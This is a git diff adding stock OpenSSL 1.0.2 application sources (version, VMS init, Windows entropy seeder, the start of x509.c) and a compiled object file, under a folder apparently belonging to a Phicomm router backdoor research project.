+        if (SSLeay() == SSLEAY_VERSION_NUMBER) {
+            printf("%s\n", SSLeay_version(SSLEAY_VERSION));
+        } else {
+            printf("%s (Library: %s)\n",
+                   OPENSSL_VERSION_TEXT, SSLeay_version(SSLEAY_VERSION));
+        }
+    }
+    if (date)
+        printf("%s\n", SSLeay_version(SSLEAY_BUILT_ON));
+    if (platform)
+        printf("%s\n", SSLeay_version(SSLEAY_PLATFORM));
+    if (options) {
+        printf("options:  ");
+        printf("%s ", BN_options());
+#ifndef OPENSSL_NO_MD2
+        printf("%s ", MD2_options());
+#endif
+#ifndef OPENSSL_NO_RC4
+        printf("%s ", RC4_options());
+#endif
+#ifndef OPENSSL_NO_DES
+        printf("%s ", DES_options());
+#endif
+#ifndef OPENSSL_NO_IDEA
+        printf("%s ", idea_options());
+#endif
+#ifndef OPENSSL_NO_BF
+        printf("%s ", BF_options());
+#endif
+        printf("\n");
+    }
+    if (cflags)
+        printf("%s\n", SSLeay_version(SSLEAY_CFLAGS));
+    if (dir)
+        printf("%s\n", SSLeay_version(SSLEAY_DIR));
+ end:
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/version.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/version.o
new file mode 100644
index 0000000000000000000000000000000000000000..50dae51c0a6395d08978bd83ede6e36f58d835df
GIT binary patch
literal 4680
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
G`u_t9JY`1!

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/vms_decc_init.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/vms_decc_init.c
new file mode 100644
index 0000000..3b6de11
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/vms_decc_init.c
@@ -0,0 +1,172 @@
+#if defined( __VMS) && !defined( OPENSSL_NO_DECC_INIT) && \
+ defined( __DECC) && !defined( __VAX) && (__CRTL_VER >= 70301000)
+# define USE_DECC_INIT 1
+#endif
+
+#ifdef USE_DECC_INIT
+
+/*-
+ * 2010-04-26 SMS.
+ *
+ *----------------------------------------------------------------------
+ *
+ *       decc_init()
+ *
+ *    On non-VAX systems, uses LIB$INITIALIZE to set a collection of C
+ *    RTL features without using the DECC$* logical name method.
+ *
+ *----------------------------------------------------------------------
+ */
+
+# include <stdio.h>
+# include <stdlib.h>
+# include <unixlib.h>
+
+/* Global storage. */
+
+/* Flag to sense if decc_init() was called. */
+
+int decc_init_done = -1;
+
+/* Structure to hold a DECC$* feature name and its desired value. */
+
+typedef struct {
+    char *name;
+    int value;
+} decc_feat_t;
+
+/*
+ * Array of DECC$* feature names and their desired values. Note:
+ * DECC$ARGV_PARSE_STYLE is the urgent one.
+ */
+
+decc_feat_t decc_feat_array[] = {
+    /* Preserve command-line case with SET PROCESS/PARSE_STYLE=EXTENDED */
+    {"DECC$ARGV_PARSE_STYLE", 1},
+
+    /* Preserve case for file names on ODS5 disks. */
+    {"DECC$EFS_CASE_PRESERVE", 1},
+
+    /*
+     * Enable multiple dots (and most characters) in ODS5 file names, while
+     * preserving VMS-ness of ";version".
+     */
+    {"DECC$EFS_CHARSET", 1},
+
+    /* List terminator. */
+    {(char *)NULL, 0}
+};
+
+/* LIB$INITIALIZE initialization function. */
+
+static void decc_init(void)
+{
+    char *openssl_debug_decc_init;
+    int verbose = 0;
+    int feat_index;
+    int feat_value;
+    int feat_value_max;
+    int feat_value_min;
+    int i;
+    int sts;
+
+    /* Get debug option. */
+    openssl_debug_decc_init = getenv("OPENSSL_DEBUG_DECC_INIT");
+    if (openssl_debug_decc_init != NULL) {
+        verbose = strtol(openssl_debug_decc_init, NULL, 10);
+        if (verbose <= 0) {
+            verbose = 1;
+        }
+    }
+
+    /* Set the global flag to indicate that LIB$INITIALIZE worked. */
+    decc_init_done = 1;
+
+    /* Loop through all items in the decc_feat_array[]. */
+
+    for (i = 0; decc_feat_array[i].name != NULL; i++) {
+        /* Get the feature index. */
+        feat_index = decc$feature_get_index(decc_feat_array[i].name);
+        if (feat_index >= 0) {
+            /* Valid item.  Collect its properties. */
+            feat_value = decc$feature_get_value(feat_index, 1);
+            feat_value_min = decc$feature_get_value(feat_index, 2);
+            feat_value_max = decc$feature_get_value(feat_index, 3);
+
+            /* Check the validity of our desired value. */
+            if ((decc_feat_array[i].value >= feat_value_min) &&
+                (decc_feat_array[i].value <= feat_value_max)) {
+                /* Valid value.  Set it if necessary. */
+                if (feat_value != decc_feat_array[i].value) {
+                    sts = decc$feature_set_value(feat_index,
+                                                 1, decc_feat_array[i].value);
+
+                    if (verbose > 1) {
+                        fprintf(stderr, " %s = %d, sts = %d.\n",
+                                decc_feat_array[i].name,
+                                decc_feat_array[i].value, sts);
+                    }
+                }
+            } else {
+                /* Invalid DECC feature value. */
+                fprintf(stderr,
+                        " INVALID DECC$FEATURE VALUE, %d: %d <= %s <= %d.\n",
+                        feat_value,
+                        feat_value_min, decc_feat_array[i].name,
+                        feat_value_max);
+            }
+        } else {
+            /* Invalid DECC feature name. */
+            fprintf(stderr,
+                    " UNKNOWN DECC$FEATURE: %s.\n", decc_feat_array[i].name);
+        }
+    }
+
+    if (verbose > 0) {
+        fprintf(stderr, " DECC_INIT complete.\n");
+    }
+}
+
+/* Get "decc_init()" into a valid, loaded LIB$INITIALIZE PSECT. */
+
+# pragma nostandard
+
+/*
+ * Establish the LIB$INITIALIZE PSECTs, with proper alignment and other
+ * attributes.  Note that "nopic" is significant only on VAX.
+ */
+# pragma extern_model save
+
+# if __INITIAL_POINTER_SIZE == 64
+#  define PSECT_ALIGN 3
+# else
+#  define PSECT_ALIGN 2
+# endif
+
+# pragma extern_model strict_refdef "LIB$INITIALIZ" PSECT_ALIGN, nopic, nowrt
+const int spare[8] = { 0 };
+
+# pragma extern_model strict_refdef "LIB$INITIALIZE" PSECT_ALIGN, nopic, nowrt
+void (*const x_decc_init) () = decc_init;
+
+# pragma extern_model restore
+
+/* Fake reference to ensure loading the LIB$INITIALIZE PSECT. */
+
+# pragma extern_model save
+
+int LIB$INITIALIZE(void);
+
+# pragma extern_model strict_refdef
+int dmy_lib$initialize = (int)LIB$INITIALIZE;
+
+# pragma extern_model restore
+
+# pragma standard
+
+#else                           /* def USE_DECC_INIT */
+
+/* Dummy code to avoid a %CC-W-EMPTYFILE complaint. */
+int decc_init_dummy(void);
+
+#endif                          /* def USE_DECC_INIT */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/winrand.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/winrand.c
new file mode 100644
index 0000000..44f57a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/winrand.c
@@ -0,0 +1,146 @@
+/* apps/winrand.c */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*-
+ * Usage: winrand [filename]
+ *
+ * Collects entropy from mouse movements and other events and writes
+ * random data to filename or .rnd
+ */
+
+#include <windows.h>
+#include <openssl/opensslv.h>
+#include <openssl/rand.h>
+
+LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
+const char *filename;
+
+int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
+                   PSTR cmdline, int iCmdShow)
+{
+    static char appname[] = "OpenSSL";
+    HWND hwnd;
+    MSG msg;
+    WNDCLASSEX wndclass;
+    char buffer[200];
+
+    if (cmdline[0] == '\0')
+        filename = RAND_file_name(buffer, sizeof buffer);
+    else
+        filename = cmdline;
+
+    RAND_load_file(filename, -1);
+
+    wndclass.cbSize = sizeof(wndclass);
+    wndclass.style = CS_HREDRAW | CS_VREDRAW;
+    wndclass.lpfnWndProc = WndProc;
+    wndclass.cbClsExtra = 0;
+    wndclass.cbWndExtra = 0;
+    wndclass.hInstance = hInstance;
+    wndclass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
+    wndclass.hCursor = LoadCursor(NULL, IDC_ARROW);
+    wndclass.hbrBackground = (HBRUSH) GetStockObject(WHITE_BRUSH);
+    wndclass.lpszMenuName = NULL;
+    wndclass.lpszClassName = appname;
+    wndclass.hIconSm = LoadIcon(NULL, IDI_APPLICATION);
+    RegisterClassEx(&wndclass);
+
+    hwnd = CreateWindow(appname, OPENSSL_VERSION_TEXT,
+                        WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT,
+                        CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hInstance,
+                        NULL);
+
+    ShowWindow(hwnd, iCmdShow);
+    UpdateWindow(hwnd);
+
+    while (GetMessage(&msg, NULL, 0, 0)) {
+        TranslateMessage(&msg);
+        DispatchMessage(&msg);
+    }
+
+    return msg.wParam;
+}
+
+LRESULT CALLBACK WndProc(HWND hwnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
+{
+    HDC hdc;
+    PAINTSTRUCT ps;
+    RECT rect;
+    static int seeded = 0;
+
+    switch (iMsg) {
+    case WM_PAINT:
+        hdc = BeginPaint(hwnd, &ps);
+        GetClientRect(hwnd, &rect);
+        DrawText(hdc, "Seeding the PRNG. Please move the mouse!", -1,
+                 &rect, DT_SINGLELINE | DT_CENTER | DT_VCENTER);
+        EndPaint(hwnd, &ps);
+        return 0;
+
+    case WM_DESTROY:
+        PostQuitMessage(0);
+        return 0;
+    }
+
+    if (RAND_event(iMsg, wParam, lParam) == 1 && seeded == 0) {
+        seeded = 1;
+        if (RAND_write_file(filename) <= 0)
+            MessageBox(hwnd, "Couldn't write random file!",
+                       "OpenSSL", MB_OK | MB_ICONERROR);
+        PostQuitMessage(0);
+    }
+
+    return DefWindowProc(hwnd, iMsg, wParam, lParam);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/x509.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/x509.c
new file mode 100644
index 0000000..d005c82
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/x509.c
@@ -0,0 +1,1275 @@
+/* apps/x509.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <assert.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#ifdef OPENSSL_NO_STDIO
+# define APPS_WIN16
+#endif
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/asn1.h>
+#include <openssl/err.h>
+#include <openssl/bn.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/objects.h>
+#include <openssl/pem.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+
+#undef PROG
+#define PROG x509_main
+
+#undef POSTFIX
+#define POSTFIX ".srl"
+#define DEF_DAYS        30
+
+static const char *x509_usage[] = {
+    "usage: x509 args\n",
+    " -inform arg     - input format - default PEM (one of DER, NET or PEM)\n",
+    " -outform arg    - output format - default PEM (one of DER, NET or PEM)\n",
+    " -keyform arg    - private key format - default PEM\n",
+    " -CAform arg     - CA format - default PEM\n",
+    " -CAkeyform arg  - CA key format - default PEM\n",
+    " -in arg         - input file - default stdin\n",
+    " -out arg        - output file - default stdout\n",
+    " -passin arg     - private key password source\n",
+    " -serial         - print serial number value\n",
+    " -subject_hash   - print subject hash value\n",
+#ifndef OPENSSL_NO_MD5
+    " -subject_hash_old   - print old-style (MD5) subject hash value\n",
+#endif
+    " -issuer_hash    - print issuer hash value\n",
+#ifndef OPENSSL_NO_MD5
+    " -issuer_hash_old    - print old-style (MD5) issuer hash value\n",
+#endif
+    " -hash           - synonym for -subject_hash\n",
+    " -subject        - print subject DN\n",
+    " -issuer         - print issuer DN\n",
+    " -email          - print email address(es)\n",
+    " -startdate      - notBefore field\n",
+    " -enddate        - notAfter field\n",
+    " -purpose        - print out certificate purposes\n",
+    " -dates          - both Before and After dates\n",
+    " -modulus        - print the RSA key modulus\n",
+    " -pubkey         - output the public key\n",
+    " -fingerprint    - print the certificate fingerprint\n",
+    " -alias          - output certificate alias\n",
+    " -noout          - no certificate output\n",
+    " -ocspid         - print OCSP hash values for the subject name and public key\n",
+    " -ocsp_uri       - print OCSP Responder URL(s)\n",
+    " -trustout       - output a \"trusted\" certificate\n",
+    " -clrtrust       - clear all trusted purposes\n",
+    " -clrreject      - clear all rejected purposes\n",
+    " -addtrust arg   - trust certificate for a given purpose\n",
+    " -addreject arg  - reject certificate for a given purpose\n",
+    " -setalias arg   - set certificate alias\n",
+    " -days arg       - How long till expiry of a signed certificate - def 30 days\n",
+    " -checkend arg   - check whether the cert expires in the next arg seconds\n",
+    "                   exit 1 if so, 0 if not\n",
+    " -signkey arg    - self sign cert with arg\n",
+    " -x509toreq      - output a certification request object\n",
+    " -req            - input is a certificate request, sign and output.\n",
+    " -CA arg         - set the CA certificate, must be PEM format.\n",
+    " -CAkey arg      - set the CA key, must be PEM format\n",
+    "                   missing, it is assumed to be in the CA file.\n",
+    " -CAcreateserial - create serial number file if it does not exist\n",
+    " -CAserial arg   - serial file\n",
+    " -set_serial     - serial number to use\n",
+    " -text           - print the certificate in text form\n",
+    " -C              - print out C code forms\n",
+    " -md2/-md5/-sha1/-mdc2 - digest to use\n",
+    " -extfile        - configuration file with X509V3 extensions to add\n",
+    " -extensions     - section from config file with X509V3 extensions to add\n",
+    " -clrext         - delete extensions before signing and input certificate\n",
+    " -nameopt arg    - various certificate name options\n",
+#ifndef OPENSSL_NO_ENGINE
+    " -engine e       - use engine e, possibly a hardware device.\n",
+#endif
+    " -certopt arg    - various certificate text options\n",
+    " -checkhost host - check certificate matches \"host\"\n",
+    " -checkemail email - check certificate matches \"email\"\n",
+    " -checkip ipaddr - check certificate matches \"ipaddr\"\n",
+    NULL
+};
+
+static int MS_CALLBACK callb(int ok, X509_STORE_CTX *ctx);
+static int sign(X509 *x, EVP_PKEY *pkey, int days, int clrext,
+                const EVP_MD *digest, CONF *conf, char *section);
+static int x509_certify(X509_STORE *ctx, char *CAfile, const EVP_MD *digest,
+                        X509 *x, X509 *xca, EVP_PKEY *pkey,
+                        STACK_OF(OPENSSL_STRING) *sigopts, char *serial,
+                        int create, int days, int clrext, CONF *conf,
+                        char *section, ASN1_INTEGER *sno);
+static int purpose_print(BIO *bio, X509 *cert, X509_PURPOSE *pt);
+static int reqfile = 0;
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+static int force_version = 2;
+#endif
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    int ret = 1;
+    X509_REQ *req = NULL;
+    X509 *x = NULL, *xca = NULL;
+    ASN1_OBJECT *objtmp;
+    STACK_OF(OPENSSL_STRING) *sigopts = NULL;
+    EVP_PKEY *Upkey = NULL, *CApkey = NULL, *fkey = NULL;
+    ASN1_INTEGER *sno = NULL;
+    int i, num, badops = 0, badsig = 0;
+    BIO *out = NULL;
+    BIO *STDout = NULL;
+    STACK_OF(ASN1_OBJECT) *trust = NULL, *reject = NULL;
+    int informat, outformat, keyformat, CAformat, CAkeyformat;
+    char *infile = NULL, *outfile = NULL, *keyfile = NULL, *CAfile = NULL;
+    char *CAkeyfile = NULL, *CAserial = NULL;
+    char *fkeyfile = NULL;
+    char *alias = NULL;
+    int text = 0, serial = 0, subject = 0, issuer = 0, startdate =
+        0, enddate = 0;
+    int next_serial = 0;
+    int subject_hash = 0, issuer_hash = 0, ocspid = 0;
+#ifndef OPENSSL_NO_MD5
+    int subject_hash_old = 0, issuer_hash_old = 0;
+#endif
+    int noout = 0, sign_flag = 0, CA_flag = 0, CA_createserial = 0, email = 0;
+    int ocsp_uri = 0;
+    int trustout = 0, clrtrust = 0, clrreject = 0, aliasout = 0, clrext = 0;
+    int C = 0;
+    int x509req = 0, days = DEF_DAYS, modulus = 0, pubkey = 0;
+    int pprint = 0;
+    const char **pp;
+    X509_STORE *ctx = NULL;
+    X509_REQ *rq = NULL;
+    int fingerprint = 0;
+    char buf[256];
+    const EVP_MD *md_alg, *digest = NULL;
+    CONF *extconf = NULL;
+    char *extsect = NULL, *extfile = NULL, *passin = NULL, *passargin = NULL;
+    int need_rand = 0;
+    int checkend = 0, checkoffset = 0;
+    unsigned long nmflag = 0, certflag = 0;
+    char *checkhost = NULL;
+    char *checkemail = NULL;
+    char *checkip = NULL;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+
+    reqfile = 0;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+    STDout = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+    {
+        BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+        STDout = BIO_push(tmpbio, STDout);
+    }
+#endif
+
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+    keyformat = FORMAT_PEM;
+    CAformat = FORMAT_PEM;
+    CAkeyformat = FORMAT_PEM;
+
+    ctx = X509_STORE_new();
+    if (ctx == NULL)
+        goto end;
+    X509_STORE_set_verify_cb(ctx, callb);
+
+    argc--;
+    argv++;
+    num = 0;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-keyform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-req") == 0) {
+            reqfile = 1;
+            need_rand = 1;
+        } else if (strcmp(*argv, "-CAform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-CAkeyform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAkeyformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-sigopt") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!sigopts)
+                sigopts = sk_OPENSSL_STRING_new_null();
+            if (!sigopts || !sk_OPENSSL_STRING_push(sigopts, *(++argv)))
+                goto bad;
+        }
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+        else if (strcmp(*argv, "-force_version") == 0) {
+            if (--argc < 1)
+                goto bad;
+            force_version = atoi(*(++argv)) - 1;
+        }
+#endif
+        else if (strcmp(*argv, "-days") == 0) {
+            if (--argc < 1)
+                goto bad;
+            days = atoi(*(++argv));
+            if (days == 0) {
+                BIO_printf(bio_err, "bad number of days\n");
+                goto bad;
+            }
+        } else if (strcmp(*argv, "-passin") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargin = *(++argv);
+        } else if (strcmp(*argv, "-extfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            extfile = *(++argv);
+        } else if (strcmp(*argv, "-extensions") == 0) {
+            if (--argc < 1)
+                goto bad;
+            extsect = *(++argv);
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-signkey") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyfile = *(++argv);
+            sign_flag = ++num;
+            need_rand = 1;
+        } else if (strcmp(*argv, "-CA") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAfile = *(++argv);
+            CA_flag = ++num;
+            need_rand = 1;
+        } else if (strcmp(*argv, "-CAkey") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAkeyfile = *(++argv);
+        } else if (strcmp(*argv, "-CAserial") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAserial = *(++argv);
+        } else if (strcmp(*argv, "-set_serial") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!(sno = s2i_ASN1_INTEGER(NULL, *(++argv))))
+                goto bad;
+        } else if (strcmp(*argv, "-force_pubkey") == 0) {
+            if (--argc < 1)
+                goto bad;
+            fkeyfile = *(++argv);
+        } else if (strcmp(*argv, "-addtrust") == 0) {
+            if (--argc < 1)
+                goto bad;
